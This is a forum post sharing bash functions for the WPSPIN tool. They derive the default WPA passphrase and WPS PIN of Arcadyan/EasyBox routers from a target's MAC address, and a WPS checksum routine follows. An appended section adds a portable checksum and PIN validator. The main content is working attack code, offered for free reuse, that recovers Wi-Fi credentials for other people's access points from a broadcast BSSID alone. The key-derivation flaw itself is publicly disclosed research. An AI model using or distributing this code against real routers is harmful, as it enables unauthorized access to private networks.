
Originally Posted by slim76
LOL, cheers dude.
I'll be honest and say fixing that bug is probably beyond my knowledge at this point in time, maybe someone else who knows what they're doing could fix the issue for us.

I made an update of wpspin and I implemented the corrected algorithm in bash in a function called ARCADYAN.
I just simplified and corrected the bash code for the WPA from wotan and used it for the PIN with the same variables.
You "feed it" with $BSSID, which is the MAC address of the target in the original format XX:XX:XX:XX:XX:XX
It gives you back $DEFAULTWPA with the WPA passphrase and $STRING, which are the 7 numbers of the PIN.
Then it calls $CHECKSUM, which you already have implemented in your script, to generate the full PIN (variable $PIN).
Code:
ARCADYAN(){
    # WPSPIN 1.5 - GPL v 3 by kcdtv
    # This function uses three amazing works
    # 1) easybox_keygen.sh (c) 2012 GPLv3 by Stefan Wotan and Sebastian Petters from www.wotan.cc
    # 2) easybox_wps.py by Stefan Viehböck http://seclists.org/fulldisclosure/2013/Aug/51
    # 3) Vodafone-XXXX Arcadyan Essid,PIN WPS and WPA Key Generator by Coeman76 from lampiweb team (www.lampiweb.com)
    #
    # Thanks to the three of them for their dedication and passion and for delivering full disclosure and free code
    # This function is based on the script easybox_keygen.sh previously mentioned
    # The quotations from the original work start with double dash and are between quotes
    # Some variables and lines are changed for a better integration and I added the PIN calculation and Coeman76's trick for default WPA
    # the lines quoted with six dash and "unchanged" are exactly the same as in easybox_keygen like this "######unchanged"
    # This function requires $BSSID which is the MAC address ( hex may format XX:XX:XX:XX:XX:XX)
    # It will return $DEFAULTSSID, with essid by default, the wpa passphrase ($DEFAULTWPA) and $STRING, the 7 first digits of our PIN, ready to use in CHECKSUM to
    # give the full WPS PIN ($PIN)

    ## "Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal." < original quote from easybox_keygen.sh
    # suppression of $take5 and $last4 compared with the easybox code, the job is done directly in the array value assignment;
    # also the variable $MAC has been replaced by $BSSID that is used in WPSPIN
    deci=($(printf "%04d" "0x`(echo $BSSID | cut -d ':' -f5,6 | tr -d ':')`" | sed 's/.*\(....\)/\1/;s/./& /g'))
    ## "The digits M9 to M12 are just the last digits (9.-12.) of the MAC:" < original quote from easybox_keygen.sh
    hexi=($(echo ${BSSID:12:5} | sed 's/://;s/./& /g')) ######unchanged
    ## K1 = last byte of (d0 + d1 + h2 + h3) < original quote from easybox_keygen.sh
    ## K2 = last byte of (h0 + h1 + d2 + d3) < original quote from easybox_keygen.sh
    c1=$(printf "%d + %d + %d + %d" ${deci[0]} ${deci[1]} 0x${hexi[2]} 0x${hexi[3]}) ######unchanged
    c2=$(printf "%d + %d + %d + %d" 0x${hexi[0]} 0x${hexi[1]} ${deci[2]} ${deci[3]}) ######unchanged
    K1=$((($c1)%16)) ######unchanged
    K2=$((($c2)%16)) ######unchanged
    X1=$((K1^${deci[3]})) ######unchanged
    X2=$((K1^${deci[2]})) ######unchanged
    X3=$((K1^${deci[1]})) ######unchanged
    Y1=$((K2^0x${hexi[1]})) ######unchanged
    Y2=$((K2^0x${hexi[2]})) ######unchanged
    Y3=$((K2^0x${hexi[3]})) ######unchanged
    Z1=$((0x${hexi[2]}^${deci[3]})) ######unchanged
    Z2=$((0x${hexi[3]}^${deci[2]})) ######unchanged
    Z3=$((K1^K2)) ######unchanged
    # X1..Z3 hold values 0-15 in decimal, so each one is formatted as a single hex digit before being
    # concatenated; pasting the decimal values directly after "0x" gives a wrong number when a value is 10-15
    HEXPIN=$(printf '%x%x%x%x%x%x%x' $X1 $X2 $Y1 $Y2 $Z1 $Z2 $X3)
    STRING=$(printf '%08d\n' $((0x$HEXPIN)) | rev | cut -c -7 | rev) # this is to generate our PIN later, the 7 first digits
    # the change with respect to the original script in the most important thing, the default pass, is the adaptation
    # of Coeman76's work on Spanish Vodafone where he found out that no 0 were used in the final pass
    DEFAULTWPA=$(printf "%x%x%x%x%x%x%x%x%x\n" $X1 $Y1 $Z1 $X2 $Y2 $Z2 $X3 $Y3 $Z3 | tr a-f A-F | tr 0 1)
    CHECKSUM
}
I put you back CHECKSUM in case it helps you
Code:
CHECKSUM(){ # The function checksum was written for bash by antares_145 from crack-wifi.com
    # We have to define the string $STRING first (the 7 first numbers of the WPS PIN)
    # to get a result using this function
    PIN=`expr 10 '*' $STRING`
    ACCUM=0
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # multiplying the first number by 3, the second by 1, the third by 3 etc....
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
    ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # so we follow the pattern for our seven numbers
    DIGIT=`expr $ACCUM '%' 10` # we define our control digit: the sum reduced with base 10 to the unit number
    CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus control digit "
    PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case the value of the PIN is under 10000000
} # STRING + CHECKSUM gives the full WPS PIN
Feel free to use the code, and if you have any questions about it do not hesitate to ask.
cheers
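
Added example, not part of the post above or of WPSPIN: the 3-1-3-1 weighting that CHECKSUM applies, written with shell arithmetic and paired with a validator for a full 8-digit PIN. Digits are processed one character at a time so that a leading zero (for example 0123456) is never read as octal; the function names are hypothetical.

```sh
#!/bin/sh
# Added example: WPS check digit and PIN validation (function names are hypothetical).

# wps_checksum SEVEN_DIGITS -> prints the check digit (0-9); fails on malformed input
wps_checksum() {
    s=$1
    case $s in
        ''|*[!0-9]*) return 1 ;;      # reject empty or non-numeric input
    esac
    [ "${#s}" -eq 7 ] || return 1     # exactly seven digits are expected
    accum=0
    weight=3
    while [ -n "$s" ]; do
        d=${s%"${s#?}"}               # first character of the remaining string
        s=${s#?}                      # drop that character
        accum=$((accum + weight * d))
        weight=$((4 - weight))        # alternate 3, 1, 3, 1, ...
    done
    echo $(( (10 - accum % 10) % 10 ))
}

# wps_full_pin SEVEN_DIGITS -> prints the 8-digit PIN, leading zeros preserved
wps_full_pin() {
    c=$(wps_checksum "$1") || return 1
    printf '%s%s\n' "$1" "$c"
}

# wps_pin_valid EIGHT_DIGITS -> exit status 0 if the last digit matches the checksum
wps_pin_valid() {
    p=$1
    [ "${#p}" -eq 8 ] || return 1
    c=$(wps_checksum "${p%?}") || return 1   # checksum over the first seven digits
    [ "$c" = "${p#???????}" ]                # compare with the eighth digit
}
```

Because the eighth digit is fully determined by the first seven, a WPS PIN never carries more than seven digits of entropy.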